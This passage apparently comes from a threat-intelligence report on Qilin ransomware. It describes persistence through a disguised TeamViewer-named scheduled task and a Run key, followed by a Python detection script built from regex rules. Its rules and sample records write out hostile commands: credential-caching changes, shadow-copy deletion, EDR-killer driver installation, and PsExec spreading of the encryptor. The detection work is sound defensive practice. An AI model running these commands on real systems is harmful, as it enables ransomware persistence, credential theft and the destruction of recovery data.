Once the ransomware has run, persistence is established through both a scheduled task and a registry modification. First, a scheduled task named "TVInstallRestore" is created with the /SC ONLOGON argument so that it runs at logon. To pass as a legitimate tool, the ransomware file is named "TeamViewer_Host_Setup - <encryptor_2>.exe", borrowing the TeamViewer branding (TeamViewer had been installed as an RMM tool before the ransomware was launched). Second, to make the ransomware run after each reboot, its executable is added as a value under the Run registry key.

This combination of scheduled tasks and registry entries allows the ransomware to maintain persistence across system reboots and user logons.

C:\WINDOWS\system32\schtasks /Create /TN TVInstallRestore /TR "C:\-INSTALLERS\TeamViewer_Host_Setup - <encryptor_2>.exe /RESTORE" /RU SYSTEM /SC ONLOGON /F

Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value name: <random lowercase letters>
Value data: C:\Users\Administrator\Desktop\<encryptor_2>.exe --password [PASSWORD] --no-admin
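As an added example that is not Talos's detection content or the attackers' code, the following script turns the command lines collected across the sections above (WDigest change, RDP enablement, share creation, local-admin addition, kernel driver service for the EDR killer, mshta runas launcher, symlink evaluation, shadow-copy deletion, event-log clearing, AD computer enumeration, PsExec spread, and the ONLOGON task here) into regex rules over process-creation records, and escalates a host once several distinct rules fire on it. The records are constructed Sysmon Event ID 1 / Security 4688 style entries; the hostnames, account names, IP address and paths are made up.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Command-line patterns for the techniques documented on this page.
RULES: Dict[str, re.Pattern] = {
    "wdigest_cleartext_creds":    re.compile(r"WDigest.*?UseLogonCredential.*?/d\s*1\b", re.I),
    "rdp_enabled_via_registry":   re.compile(r"fDenyTSConnections.*?/d\s*0\b", re.I),
    "local_admin_added":          re.compile(r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "drive_shared_to_everyone":   re.compile(r"\bnet\s+share\s+\S+=\w:\\.*?/grant:\s*everyone,full", re.I),
    "kernel_driver_service":      re.compile(r"\bsc\s+create\s+\S+\s+type=\s*kernel\b", re.I),
    "mshta_runas_launcher":       re.compile(r"\bmshta\s+vbscript:.*?ShellExecute.*?\brunas\b", re.I),
    "symlink_evaluation_enabled": re.compile(r"\bfsutil\s+behavior\s+set\s+SymlinkEvaluation\s+R2[RL]:1", re.I),
    "shadow_copies_deleted":      re.compile(r"\bvssadmin(?:\.exe)?\s+Delete\s+Shadows\s+/all\b", re.I),
    "vss_service_disabled":       re.compile(r"\bwmic\s+service\s+where\s+name='vss'\s+call\s+ChangeStartMode\s+Disabled", re.I),
    "event_logs_cleared":         re.compile(r"EventLogSession\]::GlobalSession\.ClearLog", re.I),
    "ad_computer_enumeration":    re.compile(r"Get-ADComputer\s+-Filter\s+\*", re.I),
    "psexec_spread":              re.compile(r"-accepteula\s+\\\\\S+.*?\s-c\b.*?--spread\b", re.I),
    "onlogon_task_persistence":   re.compile(r"\bschtasks\s+/Create\b.*?/SC\s+ONLOGON\b", re.I),
}

Event = Dict[str, str]

# Constructed process-creation records (host, user, command line); not real telemetry.
EVENTS: List[Event] = [
    {"host": "FS01", "user": r"CORP\svc_backup", "cmdline": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1"},
    {"host": "FS01", "user": r"CORP\svc_backup", "cmdline": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"host": "FS01", "user": r"CORP\svc_backup", "cmdline": r"net share c=c:\ /grant:everyone,full"},
    {"host": "FS01", "user": r"CORP\svc_backup", "cmdline": r"sc create dark type= kernel binPath= C:\Users\svc_backup\Downloads\DarkKill\Debug\dark.sys"},
    {"host": "FS01", "user": r"CORP\svc_backup", "cmdline": r"cmd /C fsutil behavior set SymlinkEvaluation R2R:1"},
    {"host": "FS01", "user": r"CORP\svc_backup", "cmdline": r"cmd /C vssadmin.exe Delete Shadows /all /quiet"},
    {"host": "FS01", "user": r"CORP\svc_backup", "cmdline": r"cmd /C PsExec.exe -accepteula \\10.10.20.15 -c -f -h -d -i C:\Users\svc_backup\encryptor_1.exe --password REDACTED --spread --spread-process"},
    {"host": "FS01", "user": r"NT AUTHORITY\SYSTEM", "cmdline": r'C:\WINDOWS\system32\schtasks /Create /TN TVInstallRestore /TR "C:\-INSTALLERS\TeamViewer_Host_Setup - encryptor_2.exe /RESTORE" /RU SYSTEM /SC ONLOGON /F'},
    {"host": "DC01", "user": r"CORP\svc_backup", "cmdline": "powershell -Command Import-Module ActiveDirectory ; Get-ADComputer -Filter * | Select-Object -ExpandProperty DNSHostName"},
    {"host": "WS07", "user": r"CORP\jdoe", "cmdline": "net user jdoe /domain"},
    {"host": "WS07", "user": r"CORP\jdoe", "cmdline": r"schtasks /Create /TN NightlyBackup /TR C:\ops\backup.cmd /SC DAILY /ST 23:00"},
]


def match_rules(cmdline: str) -> List[str]:
    """Names of all rules whose pattern occurs in one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def evaluate(events: List[Event], min_rules: int = 3) -> Tuple[List[Tuple[str, str, str]], List[str]]:
    """Return (host, rule, cmdline) hits and the hosts that tripped at least min_rules distinct rules."""
    hits: List[Tuple[str, str, str]] = []
    per_host: Dict[str, set] = defaultdict(set)
    for ev in events:
        for rule in match_rules(ev["cmdline"]):
            hits.append((ev["host"], rule, ev["cmdline"]))
            per_host[ev["host"]].add(rule)
    escalate = sorted(h for h, rules in per_host.items() if len(rules) >= min_rules)
    return hits, escalate


if __name__ == "__main__":
    hits, escalate = evaluate(EVENTS)
    for host, rule, cmd in hits:
        print(f"{host:5} {rule:28} {cmd[:70]}")
    print("escalate:", escalate)
```

Two design points: the rules key on arguments, not on image names, so renamed binaries still match (the PsExec rule triggers on -accepteula plus -c and --spread regardless of the file name), and the per-host threshold is what separates a lone Get-ADComputer on the domain controller (which an administrator might run) from the file server on which eight of the documented steps occur in sequence. Tune min_rules and the rule set to your environment; the benign DAILY scheduled task and the "net user /domain" lookup are included to show that ordinary administration does not trip them.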

Appendix

Figure 27. Summary of post-compromise TTPs/tool ​​workflows across multiple scenarios.

MITRE ATT&CK TTPs

Conclusion

Qilin remains one of the most aggressive ransomware groups. It relies on stolen VPN credentials, legitimate tools such as Cyberduck and WinRAR, and scripts that disable defenses before encrypting systems across the network.

Its activity shows that modern RaaS operations are a full-fledged business. To reduce risk, organizations should enforce MFA on remote access, monitor PowerShell activity, and watch for data transfers to cloud storage services.

Qilin is a reminder that even familiar tools can become weapons in the hands of cybercriminals.
